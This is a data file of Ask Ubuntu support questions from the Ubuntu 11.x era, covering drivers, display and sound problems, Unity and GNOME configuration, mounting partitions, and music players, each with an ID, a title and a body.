75568	why ubuntu is slower on a atom dual core that on a atom single core ?	i am a ubuntu fan from a long time ( since 7.04 ) , and recently i bought and asus 1215n with nvidia optimus ion ( ... no comments here ... . ) with an atom processor dual core to replace my msi wind u100 that became old . but , with the use , i 've noticed that ubuntu , 10.10 , 11.04 and even 11.10 , is slower on my asus 1215n that on my msi wind u100.. i use ubuntu like a charm on my msi wind u100 , i can multitask , an using an operating system like ubuntu is a very pleasent task , because windows is extremly slow on this computer . i dind't noticed no lag or something like that on my msi wind , even with 10tabs on google chrome , eclipse open , updating the system and more . but in my asus 1215n , with 2gb of ram and an atom dual core 1.8ghz ( the msi wind u100 is an atom single core 1.6ghz ) ubuntu , is barely unusable , nautilus , update manager , chrome , eclipse and others take ages to start , and if i have 2 applications open ( like terminal and gedit ( i am not kidding ) ) , it becames so slow that i ca n't used it correctly . important information ( configuration of booth the computers ) : - ubuntu 11.10 - unity 3d - 2gb of ram windows 7 works better in asus 1215n and arch linux with gnome3 or kde4 works better on my asus 1215n that ubuntu . is this normal ( i think not , but maybe there is an explanation , like the dual core of the atom porely used ) ? and how can i solve this ? ( unity-2d works at the same speed or worse ) .
75571	i want to sync my music folder , ubuntu one says it will sync once i subscribe . i just bought 20 gigs and it is still not syncying ?	i want to sync my music folder , ubuntu one says it will sync once i subscribe . i just bought 20 gigs and it is still not syncing ! what gives ? i paid but nothing is happening , please do n't tell me i am required to purchase the streaming music option just to back up my music in the music folder .
75576	trouble with external monitor in 11.10	i 'm getting this error when i want to configure an external monitor to connect it to my laptop . requested position/size for crtc 148 is outside the allowed limit : position= ( 1366 , 0 ) , size= ( 1366 , 768 ) , maximum= ( 1600 , 1600 ) does any one know how to fix this ?
75577	upper part of desktop cut off on a panasonic viera tc-p50x3 50-inch 720p television	ubuntu displays the upper 2/3-3/4 of the desktop only . top panel is partially off screen and lower panel is way off screen . video card is nvidia gf fx 5200 agp 8x . it 's older and replaced a gf 6200 which blew some caps . i ca n't figure out xserver settings to make t.v . work as in fit within screen to see all of desktop . i 've tried without 3d drivers , with them [ 173 recommended ] and with experimental nouveax ... neither of those video cards seemed very adaptable to the situation of using xserver settings . tried twin view and other setting . the more i worked with it the more it got messed up until both panels are not visible . do n't know what else to say except thanx for any feedback .
75578	network connection problems on ubuntu 10.04 lts server ?	i am running ubuntu 10.04 lts on a dell poweredge t410 and using a wired network connection . whenever system becomes idle , it looses network connection . i needed to either logout or restart the machine in order to make network connections work . however , i have another dell server running 10.04 lts and it is working fine . $ lspci ... ... 01:00.0 ethernet controller : broadcom corporation netxtreme ii bcm5716 gigabit ethernet ( rev 20 ) 01:00.1 ethernet controller : broadcom corporation netxtreme ii bcm5716 gigabit ethernet ( rev 20 ) ... ... $ uname -a linux ubuntu-user 2.6.32-34-server # 77-ubuntu smp tue sep 13 20:54:38 utc 2011 x86_64 gnu/linux $ tail -300 /var/log/kern.log | grep `` nov 4 '' nov 4 12:36:34 ubuntu-user kernel : [ 161497.534069 ] npviewer.bin [ 17951 ] : segfault at eeb740a4 ip 00000000f5d74c83 sp 00000000ff8d4ed0 error 4 in libflashplayer.so [ f58f7000+fc7000 ] $ tail -10 /var/log/pm-powersave.log /usr/lib/pm-utils/power.d/powersave-policy-hda-powerdown false : success . /usr/lib/pm-utils/power.d/sched-powersave false : **sched policy powersave off success . /usr/lib/pm-utils/power.d/95hdparm-apm true : success . /usr/lib/pm-utils/power.d/anacron true : stop : unknown instance : success . /usr/lib/pm-utils/power.d/powersave-policy-dirty-writeback true : success . /usr/lib/pm-utils/power.d/powersave-policy-hda-powerdown true : success . /usr/lib/pm-utils/power.d/sched-powersave true : **sched policy powersave on success . what is the problem and how can i solve it ?
75579	very hot running with ubuntu	my laptop seems to get very hot when running with ubuntu . the vents arent blocked and its got plenty of clear airflow when in use . its noticeably hotter running ubuntu than it is running windows . i havent noticed any adverse hardware problems yet , but if it does get really hot it seems to become very slow . is this likely to be due to ubuntu or just coincidental ? if it is ubuntu is there anything i can do about it ? its an acer 5740g with an i3 2310m . edit to add further detail , im running 11.10 x64 and the fans seem to run pretty much constantly
75580	broadcom b4318 driver not appearing in additional drivers	i 'm trying to install the broadcom b4318 drivers by following this guide https : //help.ubuntu.com/community/wifidocs/driver/bcm43xx # installing_b43_drivers . i successfully run step 1 , and see it install a bunch of things . i can see it 's created a /lib/firmware/b43 directory which is packed with things . but when i try to follow step 2 , which says i should use the `` additional drivers '' program , i do n't see the b43 driver appearing anywhere . in fact it 's completely blank . i 'm at a bit of a loss . i 'm running ubuntu 11.10 , having just installed it yesterday .
75581	ubuntu 10.04 live cd ok but hdd boot is not	i have problem with new laptop lenovo t420 ( i5 ) , if i boot using live cd all drivers and every thing is ok , once boot from hard disk , the fresh ubuntu installed by the same cd , all drivers are missing . display , wired and wireless network . i try to install it multiple time and the same issue , changing the cd with new downloadable .iso the same case after instillation , all it 's missing drivers . i will not mention the upgrade kernel since with live cd all drivers are working fine . any advice . linux83 .
75583	can i install different language packages for the command line program `` info '' ?	i 'd like to install info pages for the command line program in spanish so it will take less time for me to understand and assimilate . well , it may sound quite dumb , but the problem i 'm having trying to get some information about this is that the word info is everywhere , so i do n't actualy know if these language packs have a specific more technical name . so is there a way to install different language packages for info ?
75589	how to install beta version of flash ?	i have tried to install the beta version of flash using the firefox plugin flash-aid with no luck . the beta version right now is the 11.2 and i wanted to test it how it changed in performance wise but i seen to find it difficult to install it .
75590	can i make the launcher not extend the entire height of my screen ?	i was wondering if it is possible to not extend the launcher of unity , like the dock of gnome shell ?
75593	why is rhythmbox becoming the default ( again ) ?	so , it seems with 12.04 , they 're switching back to rhythmbox , after switching from rhythmbox a year ago . i do n't get why . they say that it 's because of a blocking bug in gtk3 # ( if i understand that correctly ) , but that 's just one bug , and in the same breath they say rb is not well maintained . it seems ubuntu guys were dissatisfied with banshee in some way , but apparently the banshee guys were never notified of any problems . also , it ca n't be to save disc space by dropping mono , because at the same day it was announced that the install disc will be enlarged by 50mb . also , is n't it a bit shortsighted to push banshee for default inclusion , and then drop it again a year later ? how is that a sustainable use of dev resources , or consistent ? apparently there was quite some heavy effort by banshee devs - david nielsen used the term `` bending over backwards for ubuntu '' iirc . in summary : can anyone shed more light on this ? related question : why is banshee becoming the default ? sources : http : //www.omgubuntu.co.uk/2011/11/banshee-tomboy-and-mono-dropped-from-ubuntu-12-04-cd/ http : //www.omgubuntu.co.uk/2011/11/rhythmbox-to-return-as-ubuntu-12-04-default-music-app/ http : //www.omgubuntu.co.uk/2011/11/ubuntu-12-04-disc-size-to-be-750mb/ http : //summit.ubuntu.com/uds-p/meeting/19442/desktop-p-default-apps/ http : //banshee-media-player.2283330.n4.nabble.com/banshee-being-dropped-from-ubuntu-because-of-gtk3-support-td3985298.html
75594	rhythmbox crashes during startup	i enabled replay gain in rhythmbox and the program closed and now i can not open the program at all . if i run it from terminal i am met with : /usr/lib/python2.7/dist-packages/gobject/constants.py:24 : warning : g_boxed_type_register_static : assertion `g_type_from_name ( name ) == 0 ' failed import gobject._gobject typeerror : metaclass conflict : the metaclass of a derived class must be a ( non-strict ) subclass of the metaclasses of all its bases ** error : /build/buildd/pygobject-3.0.0/gi/_gobject/pygobject.c:929 : pygobject_new_full : assertion failed : ( tp ! = null ) aborted if i uninstall the `` plugins for rhythmbox music player '' package , rhythmbox opens , obviously missing all of the plugins . i am assuming there 's a config file or folder somewhere enabling all of the plugins i selected when i re-install the `` plugins for rhythmbox music player '' package because when i re-install the package , the issue occurs again . any ideas ?
75604	why does users theme extension not show up under gnome tweak tool ?	i have want to use user themes for gnome shell , but i am having troubles . i installed the user theme extension , but it does n't appear to show up under the gnome tweak tool . to confirm that i have the user themes extension installed , here is the feedback i get when i try to install it through terminal again : sudo apt-get install gnome-shell-extensions-user-theme reading package lists ... done building dependency tree reading state information ... done gnome-shell-extensions-user-theme is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . i go under shell extensions and there is not option to enable user themes .
75606	executing 'grub-install /dev/sda5 ' failed . this is a fatal error	i apologize in advance for my bad english . i was trying to dual boot windows 7 and kubuntu 11.10 , and i get this error 'executing 'grub-install /dev/sda5 ' failed . this is a fatal error. ' . every time when i try install grub on boot partition.tried this on my desktop and laptop and always get this error . hope anyone can help.thanks !
75607	how can i copy quanta from 11.04 ubuntu to 11.10 install ?	i did a fresh install of 11.10 and found that , quanta is no longer available , as the kde packages are no longer supported , but i copied the .kde folder to the new install and the folders inside include /share/quanta/ and all the quanta files . i was wondering if someone could tell me , how to run the program or make a launcher and would this work to use `` qunata plus '' , as i do n't like the alternatives . i need this program for my work . when upgrading from 11.04 to 11.10 you can still install and use quanta but not on a fresh install . i need to know what to copy besides the .kde folder which is in the home/user/username/.kde any help would be appreciated .
75611	mouse pointer size problem	my mouse cursor is double the normal size . its only the default pointer that is enlarged . variations like resize , busy and so on are the correct size . the problem persists even when i change cursor theme . if i move the cursor inside a firefox window it changes to the correct size . my resolution is 2560x1440 , its a single screen setup . nvidia-settings reports my dpi to be : 108x107 . i 've tired to force that dpi in the lightdm conf , since i figured it must have something to-do with the dpi calculation . i have tried to change the cursor size through dconf but the problem still remains . i have n't seen this problem before , it arrived after the upgrade from beta 2 to release version of ubuntu 11.10 . anybody got any idea what the problem might be , its pretty annoying with the huge cursor .
75625	how do i scan for wireless access points ?	in ubuntu 11.04 i used inssider to scan the available aps and sort them by signal strength . unfortunately the program seems to be broken in ubuntu 11.10 , and iwlist wlan0 scan does n't return anything meaningful . what options do i have to scan for available wireless access point , possibly with a gui ?
75628	i completely destroyed unity ! help ?	i noticed that the grid plugin was n't restoring windows to the original size . so i went to ccsm to try to tweak the options to get the desired results . i tried disabling `` snap windows to their original size '' , to then renable it and see if it worked . however , when i disabled it , the windows lost their title bars , the panel , dash and launcher were gone . i usually run `` unity -- replace '' when this sort of thing happens , but because there was no dash i could n't run any commands . so i pressed ctrl+alt+f6b ( not sure what this is callled ) and ran `` unity -- replace '' from there . however unity was n't restored and now i only have a top bar with only the appmenu and no launcher or dash . i tried to logout and reboot but neither worked . gnome shell works , though . please help me , i do n't want to reinstall the os or something to solve this issue .
75631	how do i install the gnome-keybinding-properties program ?	i installed ubuntu 11.10 and quickly ditched unity . i followed a tutorial containing instructions for getting gnome set up properly but i am stuck without the `` keyboard shortcuts '' program in system- > preferences . i know the command for this program is `` gnome-keybinding-properties '' but i do n't know what package the program belongs to . running the command yields : gnome-keybinding-properties : command not found
75638	sound not working on an intel 5 series/3400	lspci gives me these two devices : $ lspci | grep audio 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 02:00.1 audio device : ati technologies inc rv710/730 there are two devices listed in system settings|sound|output : rv710/730 digital stereo ( hdmi ) internal audio analog stereo and finally , the are not muted ! also , when i run an application that accesses the sound card , i can see it in the applications tab . any ideas ?
75643	where to find documentation for submitting a cheap paid application ?	i ca n't seem to find a concise guide to application submission . are there any links or howtos that would be helpful ?
75651	is there a desktop rss reader that supports g+ integration ?	with the recent neutering of google reader 's sharing capabilities , one of the main draws of using google reader has vanished . is there a desktop rss replacement that can import a list of feeds exported from google reader and import shared items from google plus ? i have written a yahoo pipe to substitute sharing , so i 'm interested in readers that perform this task as an internal operation ( optimally with oauth authentication into g+ to access more than simply public shared items . )
75653	turn off gnome shell notifications while user is available	i 'm currently using gnome shell . is there away to turn off the notifications while having my status as available ? i personally feel that the message notification is kinda annoying , and , if i turn it off , my status is automatically set to busy .
75657	struggles to connect to network when using wpa with a bcm43225	when booting my laptop , it will try to connect to my wireless network , however a window keeps popping up asking me for my security password , which has already been saved . i have to keep deleting my network settings , and reconnecting , otherwise it keeps failing to connect . my wireless is set up with a wpa , i do not want to lower my security because of this , but it is a pain and can take me 15mins plus to finally connect . the problem has only become apparent since a fresh install of 11.10 . ipv6 disabled . system info : 01:00.0 ethernet controller : broadcom corporation netlink bcm57780 gigabit ethernet pcie ( rev 01 ) subsystem : acer incorporated [ ali ] device 036d flags : bus master , fast devsel , latency 0 , irq 43 memory at b3400000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : tg3 kernel modules : tg3 02:00.0 network controller : broadcom corporation bcm43225 802.11b/g/n ( rev 01 ) subsystem : broadcom corporation device 04da flags : bus master , fast devsel , latency 0 , irq 17 memory at b2400000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : brcmsmac kernel modules : wl , brcmsmac additional : in terminal i get this : pst007x @ pst007x-ubuntu64 : ~ $ nm-applet start ** message : applet now removed from the notification area ** ( nm-applet:2816 ) : debug : old state indicates that this was not a disconnect 0 ** message : using fallback from indicator to gtkstatusicon ** message : applet now embedded in the notification area ** message : no keyring secrets found for auto access 01/802-11-wireless-security ; asking user . ** ( nm-applet:2816 ) : debug : foo_client_state_changed_cb note this line : ** message : no keyring secrets found for auto access 01/802-11-wireless-security ; asking user . at this point is where i am asked for the password . please report wpa issues with ubuntu 11.10 here : https : //bugs.launchpad.net/ubuntu/+source/network-manager/+bug/892727
75661	compiz profile is screwed up when switching from unity to gnome classic	gnome classic defaults to using metacity ( at least , for me ) . when i activate compiz ( compiz -- replace ) , the unity panel and launcher show up . this is due to unity being a compiz plugin . is there any way i can get compiz to use a different profile for unity ( w/the unity plugin on ) and another for gnome classic ( w/the unity plugin off ) ? even though i would prefer to keep both ( for support reasons ) , should i give up on gnome classic and just hack the hell out of my unity login 's compiz profile ?
75663	application does not open in the same workspace when switched during loading	if the workspace is switched while a program loads , its window will open in the newly-active workspace . is there any way to change this ? i 'd much prefer that the program open in the workspace it was originally launched from .
75668	how do i `` execute '' a *.desktop file from a terminal ?	is this even possible ? i fully know i can just copy it to my desktop and double-click it .
75671	why does gedit keep randomly opening new instances when opening files from nautilus ?	oh how i love ubuntu and all its features , but this `` bug '' has been making me angry for so long and i 've finally decided to ask for help here . i 've assigned all .php files to be opened with gedit whenever i double-click them in nautilus . now , the behavior is strange . i have no gedit running i double click a file to be opened a gedit window opens and the file loads i double click another file to be opened now , there are 2 possible outcomes : 5a ) the file opens in the same gedit window in a new tab 5b ) the file opens in a new gedit window , resulting in 2 gedits running . whether a or b happens seems to be totally random and keeps on going infinitely . that means i double click on 100 files and i might end up with 60 gedits , some of which will have 1 tab , some will have 2 tabs , some will have 3 tabs ... this is extremely annoying and a fix for this would be very appreciated . anyone ever tried to fix this problem ? this has happened in ubuntu 10.04 , 10.10 and 11.10 . all ubuntu versions i 've ever tested .
75673	hp dv7 beats audio subwoofer on while headphones plugged in	i have looked for answers to this but have not found anything . people have similar problems but mostly with getting the subwoofer to work at all . i got the subwoofer to work by editing the /etc/modprobe.d/alsa-base.conf file and adding options snd-hda-intel model=ref . when i plug in my headphones , the main speakers turn off but the subwoofer still has sound coming through it . the output is selected automatically in sound preferences and is set to headphones when they are plugged in . i also have tried muting the main speakers , which in turn mutes the subwoofer , before plugging in the headphones as they seem to have two different volume controls , but as soon as the headphones are plugged in , the subwoofer has sound coming out of it . i am running ubuntu 11.10 64 bit on hp dv7- 4285dx . i am able to just not have the subwoofer on but since i have gotten it to work i would like to keep it around and not have to change a config file every time i want to plug in my headphones . any ideas or suggestions would be greatly appreciated . thanks
75674	how do i start firefox with debug output at the command line ?	firefox is freezing now and again , and i want to know why . i thought i could get some debug output by starting firefox with the -g option , but it just comes to some kind of prompt and then stops . how do i get debug output so i can hopefully diagnose firefox 's problems ? here is what i currently get : $ firefox -g gnu gdb ( ubuntu/linaro 7.3-0ubuntu2 ) 7.3-2011.08 copyright ( c ) 2011 free software foundation , inc. license gplv3+ : gnu gpl version 3 or later < http : //gnu.org/licenses/gpl.html > this is free software : you are free to change and redistribute it . there is no warranty , to the extent permitted by law . type `` show copying '' and `` show warranty '' for details . this gdb was configured as `` i686-linux-gnu '' . for bug reporting instructions , please see : < http : //bugs.launchpad.net/gdb-linaro/ > ... reading symbols from /usr/lib/firefox-7.0.1/firefox ... ( no debugging symbols found ) ... done . ( gdb ) once it reaches ( gdb ) , it stops , and firefox never starts .
75680	how to install graphics and sound driver again ?	one of my friends , when trying to make an usb speaker work in ubuntu 11.10+gnome 3.2+no graphics card hp machine , accidentally removed the pulseaudio driver as well as the graphics driver . so after the boot , it gives a blank screen . i tried to remove and install xorg , but it did not help . can anyone help please ?
75685	disk space issues	the following is the output that i get for df -h. i am using dual booting with windows and ubuntu.could i think of re allocating space for drives in order to make the operations easier.or can i go along with the same partition for the time being ? filesystem size used avail use % mounted on /dev/sda6 8.9g 6.8g 1.7g 81 % / udev 620m 4.0k 620m 1 % /dev tmpfs 251m 756k 250m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 627m 320k 627m 1 % /run/shm cgroup 627m 0 627m 0 % /sys/fs/cgroup /dev/sr0 491m 491m 0 100 % /media/vcd regards abdul
75686	how to close multiple gnome-terminals ?	i am running 16 debug processes simultaneously with our adapted gdb ( called e-gdb ) . the processes are invoked by a bash script , using : gnome-terminal -e 'e-gdb -x gdbnn.cmd prognn.e' to manage the multiple sessions i can open multiple terminals using the -- geometry option to arrange them tiled on my screen . alternatively , i can use the -- tab option to have them all in one terminal . when the sessions end i close the terminal ( s ) with a click ( i do n't want it to auto-close ) . so , with multiple terms i need to click 16 times while with tabs i click once , but i have to switch between tabs to see the session results . i would like tiled tabs in a terminal so i can view them simultaneously and close all in a single click . is there a way to tile tabs ? if not , can i close all debug terminals in one action ? update : is there an easy way to kill multiple terminals based on their title ? i am using the -t option to name the windows . is there something like kill -name '*dbg* ' ?
75687	help me to determine : does this laptop have wireless ?	i 've got a pair of hp-compaq nc8000s and it seems they should have wireless ... but when i check networkmanager i do n't see it , nor when i check in all the normal places . from this lshw output : http : //pastebin.com/swzetdex i get the impression there is no wireless adapter - even though the systems both have wireless lights and buttons and even report that the wireless is on in the bios ! am i missing something ? update : having a look at the manual , it seems that this model does in fact have wireless ( it has all the physical signs of it as well , including the antennae ! ) , but it seems from a forum thread i read ( sorry do n't have the link to hand ) that these systems stopped working with ubuntu ( in terms of wireless ) in 8.10 and up : ( . the search continues afresh .
75688	how do i integrate songbird with the desktop ?	i would like to know if i can have a better integration of songbird into unity and gnome . specifically , can songbird : be controlled through the panel sound menu , like banshee in ubuntu 11.10 ? show notification bubbles when songs change ? i would rather use these features with songbird . although general suggestions on how to implement a better consolidation with ubuntu are welcome !
75692	lock screen when xscreensaver is installed	i 'm another user who dislikes the default screen-saver of oneric . i installed xscreensaver , but when i want to lock the screen , it does n't work using ctrl+alt+l , or using the option on the user menu . how can i get the locking behavior to work properly ?
75699	why is the cache size half of what it should be as reported by /proc/cpuinfo ?	/proc/cpuinfo shows the cache size to be 4mb but the specs on the intel site show the cache to be 8mb . any ideas as to why ? i 'm using 32-bit ubuntu 10.04 . $ cat /proc/cpuinfo | grep -ie `` processor|physical id|cache size '' processor : 0 cache size : 4096 kb physical id : 0 processor : 1 cache size : 4096 kb physical id : 0 processor : 2 cache size : 4096 kb physical id : 0 processor : 3 cache size : 4096 kb physical id : 0 http : //ark.intel.com/products/29765/intel-core2-quad-processor-q6600- % 288m-cache-2_40-ghz-1066-mhz-fsb % 29
75704	why does nautilus use a separate icon rather than the one already docked from the default install ?	when nautilus is running it does not group open instances with the pre-existing docked icon . it adds this file cabinet looking icon to the task bar . i know this is n't default behavior and i 'm wondering what could be causing this ? i believe i started noticing this happening after i upgraded ( via update manager ) from 11.04 to 11.10 . not 100 % sure about that though . i do have a quicklist # # heading # # in the picture i 've got my mouse on the extraneous icon .
75705	skillsoft player problem in firefox 7.0.1	i have got an online course to learn . it is implemented using skillsoft player . but , when i lauch it using firefox 7.0.1 , it is showing me an error : any fix ?
75709	how do i install kernel header files ?	i want to write a device driver but not able to find the header file can someone please help me find them ? also if someone can point out some important site links that would be really appreciated
75712	can not run compiled files on file exchange partition on a mbp 3,1	since i dual boot on my macbook pro i created a partition to exchange files between ubuntu and mac os x easily . i can copy and delete files easily on the exchange partition from both os . i can also compile files from either partition . but i can not run files from ubuntu ! ? this is the output in the terminal : bash : ./p1c : keine berechtigung
75714	is there any way to set the startup page in thunderbird to be the latest mail instead of some link ?	is there any way to set the startup page in thunderbird to be the latest mail instead of some link ?
75715	how to migrate from banshee to rhythmbox ?	as it has been decided , ubuntu precise 12.04 will feature rhythmbox as the default music player . i am aware , that it does not mean that i will not be able to use banshee , nevertheless i would like to switch to it . i have been a rhythmbox fan for a long time , but after the switch to banshee in natty i decided to give it a try and completely migrated to it . however , i am not very happy with it , it lags for me a lot and has some other issues . i would like to export all banshee data to rhythmbox . that includes : music library playlists preferably playcounts and ratings radio stations cover pictures what should i do to move all this data to rhythmbox , get it to work as the default music player , and smoothly switch completely to it ?
75717	how can i get rhythmbox to see my ubuntu one purchases ?	i have purchased a couple of albums in the ubuntu one music store which have downloaded and are visible in the default music app banshee . i much prefer the app rhythmbox though , but i ca n't figure out how to tell rhythmbox to scan for music purchases . it does n't see them automatically , and because the folder is hidden , i do n't even know where they are . i do n't want to have to move the files around just to make them available to rhythmbox . would be much nicer if rhythmbox could just scan the right folder . is this possible ?
75718	no sound in headphone	ubuntu 11.10 , kernel 3.0.0.13 . netbook medion akoya 1210 . there is no sounds comming out the headphones . i have to go in the sound applet menu and switch off and on the sound card . after that , sound come out of the headphones . is it a bug ? note i never encountered this issue since ubuntu 10.04 .
75719	error mounting ntfs partition at start-up ubuntu 11.10 - can only be mounted and accessed as root	i started getting the error '' error mounting partition to /media/date press s to skip mounting this partition or m to manually mount this partition '' at startup . i have n't found any line changed in the fstab file after the error occured . i have changed `` /dev/sda5 '' with the partition 's uuid after the error occured but it did n't help . this is how the fstab file looks like now : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda6 during installation uuid=2956fd81-0373-4d3d-8fd1-991f2c68b2f3 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda2 during installation uuid=265490d1-48c4-40a1-8ddd-df37a44a6ff2 none swap sw 0 0 uuid=0bc8605c581b81ed /media/date ntfs-3g quiet , defaults , rw 0 0 when i try to mount the patition by clicking on it in nautilus i get the error : `` error mounting : mount exited with exit code 1 : helper failed with : mount : only root can mount /dev/sda5 on /media/date '' it can be mounted through gparted , but i can only acces it as root .
75726	name of the sound settings application in ubuntu ?	i 'm trying out xubuntu and kubuntu . i have a complicated sound setup which i knew how to setup in ubuntu but i 'm having trouble doing the same in xubuntu and kubuntu . i 'd like to install the main gui application from ubuntu ( the one where you click on a taskbar and go to preferences and you see all the devices , input , output ... ) to try to set the sound in xubuntu and kubuntu . what is the name of package i need to install ? should i expect and conflicts ?
75732	sound does not work ?	ok , yesterday the sound worked great , both the internal speakers and my headphones . but today it does n't work at all . i cant find out what the problem is , i tried with rebooting the system and log in and out . my sound card is a ati sound card , and the speakers are rv710 i think . i would be really glad if i could get some help . if it matters i use ubuntu 11.10
75733	nautilus menus empty	exact same issue as closed issue : empty nautilus menus i have a nautilus window open and when i go to file , edit , view , go , bookmarks , or help , there is nothing in the menus . i 'm trying to view my network and shared folders from other systems , but can not get to it , as the `` go '' menu is empty . the left column of nautilus is showing the mounted drives and folders . network is not listed there . since the pull down menu `` view '' is empty , i can not switch the sidebar from tree to places . this system , while a desktop , runs as a vm server for me and i will not be able to reboot for a week or so .
75738	how do i delete a hard link ?	recently i created a link with the following : sudo ln -n originalfilelocation how do i delete a hard link ?
75743	how do i install drivers for a canon lbp 2900b printer ?	please help me with installation of canon lbp 2900b on my ubuntu 11.10 . i do n't have programming knowledge . please guide me step by step .
75747	lenovo ideapad z570 fails to boot	it is lenovo ideapad z570 notebook with freedos . i 've installed ubuntu 11.10 - installation is ok , no errors . but then it just not booting the system . no errors of warnings . it seems that bios is not going to load grub or something like that . it is not a dual boot issue . i want just ubuntu installed . i 've tried to load from livecd , then mount the disks , then grub-install . everything goes smoothly - no errors , no warnings . but it does not help . any ideas ? i googled the issue but found no similar . thanks .
75748	sentelic touchpad scrolling asus ux31 zenbook	the capabilities of the touchpad on the new asus ux31 zenbook leave much to be desired . the touchpad works like a mouse , but no vertical or horizontal scrolling . i contacted a developer who works for sentelic . he said : unless driver does some non-trivial works based on coordinates output , i 'm afraid that it wo n't have scrolling support at this moment . and windows driver does scrolling in driver where current linux driver does n't have such feature , yet . additionaly , given that the resource is quite limited at this moment , i 'm afraid that there is no firm schedule for scrolling support in linux driver . how can we get this driver to do some `` non-trivial works based on coordinate output '' ?
75749	how do i install java ( from tar.gz ) ?	i 'm trying to install java . please help .
75750	how can i make my lubuntu 11.10 menus look like in 11.04 ?	the menus in my lubuntu 11.10 install look very kde-ish . i 'm using the vlc open file ... -menu as an example . in lubuntu 11.04 , a different open file ... -menu would pop up . is there a way to make the menus look like in lubuntu 11.04 ? this is what the menus look like in lubuntu 11.10 : this is what the menus look like in lubuntu 11.04 :
75752	how to get the full menu ?	i upgraded to ubuntu 11.10 and when i run a simple app i.e . gedit i now do n't have the dropdown menu with i.e . `` save as.. '' where is that menu now ?
75754	deciding partitions and sizes on ubuntu 11.10 ( dual-boot windows 7 )	i need some advice for a dual boot configuration windows 7 - linux ubuntu 11.10 specifications : 2.7 ghz amd athlon 7750 , 3 gb ram , 1000 gb hdd : 100 gb allocated to windows 7 ( i use large number of programs ) - already used two primary partitions ( 100 gb and 100 mb windows - partition made ââby him ) of a maximum of 4 primary partitions on hdd linux ? i want to make separate partitions : / - i think it should be primary , 5 gb enough ? swap - primary or logical ? 1gb enough ? ( the system has 3 gb ) boot - 300 mb ? primary - logical ? ( however there are only four primary partitions of which 2 are taken from windows ) usr - install programs , considering the large number of programs use on windwos , 40 gb enough for linux ? ( space is 1000 gb hdd ) tmp - size ? i know it 's for temporary files var - size ? i think it is similar to tmp but for : ftp , sites , server home - use a lot of multimedia files , 150 - gb is enough ? win / linux shared data - this partition i want for storage data between windows and linux , i think the solution is ntfs because fat32 not support files larger than 4 gb and most movies are dvd ( 4.7 gb ) help me for deciding correct partition and sizes . if you believe that more partitions ( dev , lib , srv ... . ) are needed let me know . thank you ! ps : format file for linux best is ext 4 or ext 3 ?
75755	how to change the lightdm theme/greeter ?	i downloaded a couple greeters for lightdm , but i have not figured out how to enable them . is there a way to switch greeter , either by graphical or command-line method ? . i do not intend to change display manager , nor the background , but to change the layout and appearance of the login screen through a different `` theme '' ( greeter is the name for lightdm themes ) . thanks for your time .
75763	how to force apt to download a specific version of a package from ppa ?	what i bascially want is to have the latest libreoffice builds from this ppa : libreoffice/ppa instead of the maverick version i 'd like to install this one : 1:3.4.4~rc1-0ubuntu1~ppa1 is this possible ?
75768	ssh within a local network from a large number of systems without password	i read about logging into remote systems using ssh without entering password ; and i 've established in my system and is working pretty awesome . now the problem occurs when it comes to a local network , where several systems are present , to anyone of which i can log in ( where my account is mounted from another file server ) . the range of ips for them is 10.10.6.1-50. after logging into anyone of these systems i need to log in to another remote system ( which is in the lab , ip = 10.10.7.80 , where the user id is different ) . so when i try to log in to the lab system from any of these 50 systems , it is implied that i need to export the public keys from all of those 50 systems ( which , of course , is a tedious thing to do ) . so , can i fix this using the ip range ? ( other than copying and pasting the ids for all the 50 systems to 'authorized keys ' ) if so , how ? ps : i do n't have the sudo permissions .
75769	how do i alias `as` to `askubuntu.com` in chromium ?	i keep typing as into chromium 's address bar and hitting return , thinking it would take me to askubuntu.com . is there a way for me to alias it to askubuntu.com , so i stop wasting time closing the tab , opening a new one and typing in askubuntu.com before hitting enter ?
75774	no write access to smb share of windows drive after upgrade to 11.10	i used to create a share to my windows directory with a script . i use a script because the windows machine is not always turned on . sudo mount.cifs //muziekserver/muziek /cifs/muziek/ -o user=aak/ , uid=aak i always had full access rights using nautilus . but after upgrading to 11.10 i only have read access . all files are owned by root . any suggestions how to fix this ? using sudo works , but that ai n't a nice solution . btw windows user = 'aak ' , userid on the linux is 'aak' any help or suggestions appreciated ,
75775	after i installed ccsm , my desktop not working properly . how to restore ?	i installed ccsm and as soon i clicked on preferences , everything hanged . after waiting for some time , i restarted my computer . the desktop is not working properly . my left bar is not coming . also , the options on the top right are not coming . please help me in restoring my desktop . -- prabodh prakash
75786	installed sata drive but i can not see it when using command blkid	i have ubuntu server running of usb flash drive . i installed sata drive connected everything and fired the server up , but i can not find the new drive when using blkid command . is there any other way to mount it ? p.s . i 've no monitor , so can not check bios settings .
75788	why ubuntuone takes 4gb of ram memory	see the detail env : ubuntu 11.10 x64
75789	what will replace tomboy in 12.04 ?	i heard that tomboy is being removed in ubuntu 12.04 . i use it extensively and since it is connected to ubuntu one i figured they will have a new way to sync notes . right ? i 'll be very very sad if i lose all my notes .
75790	adding mounted device to file search	when i do file search in unity , it only searches for fles in the drive in which ubuntu is installed and not other drives . how to add different drives to it ?
75794	brightness control in ubuntu 11.10	the brightness control default setting is set to maximum in system settings > screen . every time i open my laptop i have to adjust the brightness levels manually . is there a way to change the default level setting ? ? ?
75798	executing script with terminal via command option	i implemented the answer to this question and now the title bar is gone from the terminal . i found that the python script decorator.py had to execute twice to have the effect applied . rather than tapping out ./decorator.py twice every time i started a new terminal , i created maximize to execute the script twice . this script is hotkeyed to ctrl-alt-y . currently i 've used gnome-terminal -- maximize -e /home/jason/maximize gnome-terminal -- maximize -x /home/jason/maximize as arguments for ctrl-alt-t . the issue is i can see the outline of a new terminal flash on screen , but it does n't exist for more than a fraction of a second . how can i make the new window more persistent ?
